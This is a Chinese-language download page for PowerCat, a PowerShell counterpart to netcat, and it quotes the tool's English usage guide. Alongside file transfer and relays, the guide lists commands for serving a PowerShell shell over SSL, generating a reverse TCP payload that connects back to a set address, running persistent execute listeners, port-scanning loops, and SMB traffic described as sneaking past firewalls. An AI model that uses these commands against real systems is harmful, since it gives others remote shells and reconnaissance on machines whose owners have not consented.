powershell專(zhuān)用網(wǎng)絡(luò)工具(PowerCat)

PowerCat是PowerShell的TCP/ IP瑞士軍刀，適用于Netcat & Ncat.。如果你想在powershell上連SSH或者搭建網(wǎng)絡(luò)環(huán)境，那么PowerCat絕對(duì)必不可少！歡迎下載！

PowerCat怎么用

powercat實(shí)際上是一個(gè)powershell的函數(shù)，當(dāng)你第一次使用它的時(shí)候你需要運(yùn)行腳本來(lái)加載這個(gè)函數(shù)。

由于windows默認(rèn)不允許任何腳本運(yùn)行，你需要輸入Set-ExecutionPolicy RemoteSigned來(lái)允許運(yùn)行本地的腳本。

PowerCat PowerShell模塊打包。你必須導(dǎo)入模塊使用其功能。

# Import the functions via the psd1 file:

Import-Module PowerCat.psd1

默認(rèn)情況下,PowerCat使用TCP和讀取/寫(xiě)入控制臺(tái)。

# Basic Listener:

Start-PowerCat -Port 443

# Basic Client:

Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443

文件傳輸

使用sendfile PowerCat可以用來(lái)傳輸文件和-ReceiveFile參數(shù)。

# Send File:

Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443 -SendFile C:\pathto\inputfile

# Receive File:

Start-PowerCat -Port 443 -ReceiveFile C:\pathto\outputfile

UDP和SMB

PowerCat支持多通過(guò)TCP發(fā)送數(shù)據(jù)。

# Send Data Over UDP:

Start-PowerCat -Mode Udp -Port 8000

# Send Data Over SMB (easily sneak past firewalls):

Start-PowerCat -Mode Smb -PipeName PowerCat

SSL

PowerCat動(dòng)態(tài)生成提供SSL加密的X509證書(shū)TCP連接。

# Admin privileges are required to generate the self-signed certificate.

# Serve an SSL-Encrypted (Power)Shell:

Start-PowerCat -Mode Tcp -Port 80 -SslCn <Certificate Common Name> -Execute

# Connect to an SSL encrypted Ncat listener:

# Setup *nix with openssl & Ncat:

# openssl req -X509 -newkey rsa:2048 -subj /CN=PowerCat -days 90 -keyout key.pem -out cert.pem

# ncat -l -p 80 --ssl --ssl-cert cert.pem --ssl-key key.pem

Connect-PowerCat -Mode Tcp -RemoteIp 10.1.1.1 -Port 80 -SslCn PowerCat

繼電器

PowerCat類(lèi)似于netcat繼電器繼電器,但你不需要?jiǎng)?chuàng)建一個(gè)文件或啟動(dòng)一個(gè)進(jìn)程。你也可以傳遞不同協(xié)議之間的數(shù)據(jù)連接。

# UDP Listener to TCP Client Relay:

Start-PowerCat -Mode Udp -Port 8000 -Relay tcp:10.1.1.16:443

# TCP Listener to UDP Client Relay:

Start-PowerCat -Port 8000 -Relay udp:10.1.1.16:53

# TCP Client to Client Relay

Connect-PowerCat -RemoteIp 10.1.1.1 -Port 9000 -Relay tcp:10.1.1.16:443

# TCP Listener to SMB Listener Relay

New-PowerCat -Listener -Port 8000 -Relay smb:PowerCat

生成的有效載荷

載荷可以使用New-PowerCatPayload函數(shù)生成。

# Generate a reverse tcp payload that connects back to 10.1.1.15 port 443:

New-PowerCatPayload -RemoteIp 10.1.1.15 -Port 443 -Execute

# Generate a tcp payload that listens on port 8000:

New-PowerCatPayload -Listener -Port 8000 -Execute

Misc用法

PowerCat還可以執(zhí)行端口掃描,開(kāi)始持續(xù)的聽(tīng)眾,或作為一個(gè)簡(jiǎn)單的web服務(wù)器。

# Basic TCP port scan:

1..1024 | ForEach-Object { Connect-PowerCat -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose -Disconnect }

# Basic UDP port scan:

1..1024 | ForEach-Object { Connect-PowerCat -Mode Udp -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose }

# Persistent listener:

Start-PowerCat -Port 443 -Execute -KeepAlive

# Simple Web Server:

Start-PowerCat -Port 80 -SendFile index.html

PowerCat基本功能和參數(shù)

Start-PowerCat # Starts a listener/server.

-Mode           # Defaults to Tcp, can also specify Udp or Smb.

-Port           # The port to listen on.

-PipeName       # Name of pipe to listen on.

-SslCn          # Common name for Ssl encrypting Tcp.

-Relay          # Format: "<Mode>:<Port/PipeName>"

-Execute        # Execute a console process or powershell.

-SendFile       # Filepath of file to send.

-ReceiveFile    # Filepath of file to be written.

-Disconnect     # Disconnect after connecting.

-KeepAlive      # Restart after disconnecting.

-Timeout        # Timeout option. Default: 60 seconds

Connect-PowerCat # Connects a client to a listener/server.

-Mode           # Defaults to Tcp, can also specify Udp or Smb

-RemoteIp       # IPv4 address of host to connect to.

-Port           # The port to connect to.

-PipeName       # Name of pipe to connect to.

-SslCn          # Common name for Ssl encrypting Tcp.

-Relay          # Format: "<Mode>:<IP>:<Port/PipeName>"

-Execute        # Execute a console process or powershell.

-SendFile       # Filepath of file to send.

-ReceiveFile    # Filepath of file to be written.

-Disconnect     # Disconnect after connecting.

-Timeout        # Timeout option. Default: 60 seconds